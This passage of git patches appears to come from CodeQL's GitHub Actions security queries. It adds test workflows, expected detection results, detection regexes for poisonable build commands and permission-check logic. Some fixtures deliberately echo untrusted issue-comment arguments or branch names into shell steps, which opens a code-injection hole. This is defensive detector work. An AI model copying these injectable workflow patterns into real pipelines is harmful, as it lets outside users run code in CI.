.github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -868,7 +887,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -892,6 +911,7 @@ sources | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | @@ -902,7 +922,6 @@ sources | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | @@ -992,6 +1011,7 @@ summaries | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml new file mode 100644 index 000000000000..adca4bc90ffa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + + - run: echo "${{ steps.command.outputs.command-arguments }}" + + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml new file mode 100644 index 000000000000..5422ac4e9876 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + permission-level: read + + - run: echo "${{ steps.command.outputs.command-arguments }}" + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 16119dd6453b..6dfb91f72757 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | @@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | @@ -357,6 +360,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d0834f0dff82..11036e7f8ebe 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | @@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | From a368b797fd1c2f6e9e1e8ab1b2978570267eb584 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:22 +0200 Subject: [PATCH 385/707] fix(checks): Add repository control checks --- .../codeql/actions/security/ControlChecks.qll | 20 +++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index ec7e0ad05984..90a989c1a163 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -77,7 +77,6 @@ abstract class PermissionCheck extends ControlCheck { override boolean protectsAgainstRefMutationAttacks() { result = true } } - abstract class LabelCheck extends ControlCheck { // does it protect injection attacks but not pwn requests? // pwn requests are susceptible to checkout of mutable code @@ -108,7 +107,6 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { } /* Specific implementations of control checks */ - class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') @@ -143,7 +141,14 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.full_name\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.owner\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) ) } } @@ -174,6 +179,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { this.getCallee() = "lannonbr/repo-permission-check-action" and - not this.getArgument("permission") = ["write", "admin"] + this.getArgument("permission") = ["write", "admin"] + or + this.getCallee() = "xt0rted/slash-command-action" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("permission-level") = ["write", "admin"] + ) } } From 59fd8530a33c914334f488b641458131b10ff6cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:58 +0200 Subject: [PATCH 386/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dd99208f5e34..554ef6bbe7f3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.14 +version: 0.1.15 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fe02dad9c55e..e72b14fb3582 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.14 +version: 0.1.15 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8231261ccfa8bd02c43567d51739258de74af09c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 9 Jul 2024 17:28:04 +0200 Subject: [PATCH 387/707] New poisonable steps --- .../actions/security/PoisonableSteps.qll | 8 +- ql/lib/ext/config/poisonable_steps.yml | 54 +-- .../.github/workflows/poisonable_steps.yml | 11 + .../library-tests/poisonable_steps.expected | 12 +- ql/test/library-tests/test.expected | 307 +++++++++++++----- 5 files changed, 283 insertions(+), 109 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index e22662c64db3..34246fa4e8f7 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,12 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _)) + exists( + this.getScript() + .splitAt("\n") + .trim() + .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _) + ) ) } } @@ -41,7 +46,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", group) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 56ba567aa455..f9274f54872d 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -2,7 +2,6 @@ extensions: - addsTo: pack: github/actions-all extensible: poisonableActionsDataModel - # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 # source: https://boostsecurityio.github.io/lotp/ data: - ["pre-commit/action"] @@ -14,40 +13,46 @@ extensions: - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel - # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 # source: https://boostsecurityio.github.io/lotp/ data: - - ["ant "] - - ["bundle "] - - ["cargo "] - - ["checkov "] - - ["eslint "] - - ["go generate"] - - ["go run"] - - ["gomplate "] - - ["gradle "] - - ["java -jar"] - - ["make "] + - ["ant"] + - ["awk\\s+-f"] + - ["bundle"] + - ["cargo"] + - ["checkov"] + - ["eslint"] + - ["gcloud\\s+builds submit"] + - ["golangci-lint"] + - ["gomplate"] + - ["goreleaser"] + - ["gradle"] + - ["java\\s+-jar"] + - ["make"] + - ["mdformat"] - ["mkdocs"] - ["msbuild"] - ["mvn"] - ["mypy"] - - ["npm [a-z]"] - - ["pnpm [a-z]"] + - ["(p)?npm\\s+[a-z]"] - ["pre-commit"] - ["prettier"] - - ["pip install -r"] - - ["pip install --requirement"] + - ["phpstan"] + - ["pip\\s+install\\s+-r"] + - ["pip\\s+install\\s+--requirement"] - ["poetry"] - ["pylint"] - ["pytest"] - - ["rake "] - - ["rails db:create"] - - ["rails assets:precompile"] - - ["rubocop "] - - ["terraform "] + - ["rake"] + - ["rails\\s+db:create"] + - ["rails\\s+assets:precompile"] + - ["rubocop"] + - ["sed\\s+-e"] + - ["sed\\s+-f"] + - ["stylelint"] + - ["terraform"] - ["tflint"] - - ["yarn "] + - ["yarn"] + - ["webpack"] - addsTo: pack: github/actions-all extensible: poisonableLocalScriptsDataModel @@ -59,5 +64,6 @@ extensions: - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - ["(python)\\s+(.*)\\.py", 3] - ["(ruby)\\s+(.*)\\.rb", 3] - - ["(go)\\s+(.*)\\.go", 3] + - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4] + - ["(dotnet)\\s+(.*)\\.csproj", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 7be32ca5c17a..37ec9c9ff716 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -27,3 +27,14 @@ jobs: - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: xvfb-run ./mvnw clean package + - run: echo "foo" && npm i && echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo `npm i` bar" + - run: dotnet test foo/Tests.csproj -c Release + - run: go run foo.go + - run: sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # not supported yet + - run: sed -f ./config.sed file.txt > foo.txt + - run: sed -f config file.txt > foo.txt + - run: echo "foo" | awk -f ./config.awk > foo.txt + - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index dc6b863d0b93..55105c39bdfa 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -17,4 +17,14 @@ | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c80dc006ce7a..08f9136f2e50 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -63,7 +63,18 @@ steps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -109,7 +120,18 @@ runSteps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -191,7 +213,18 @@ runStepChildren | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | 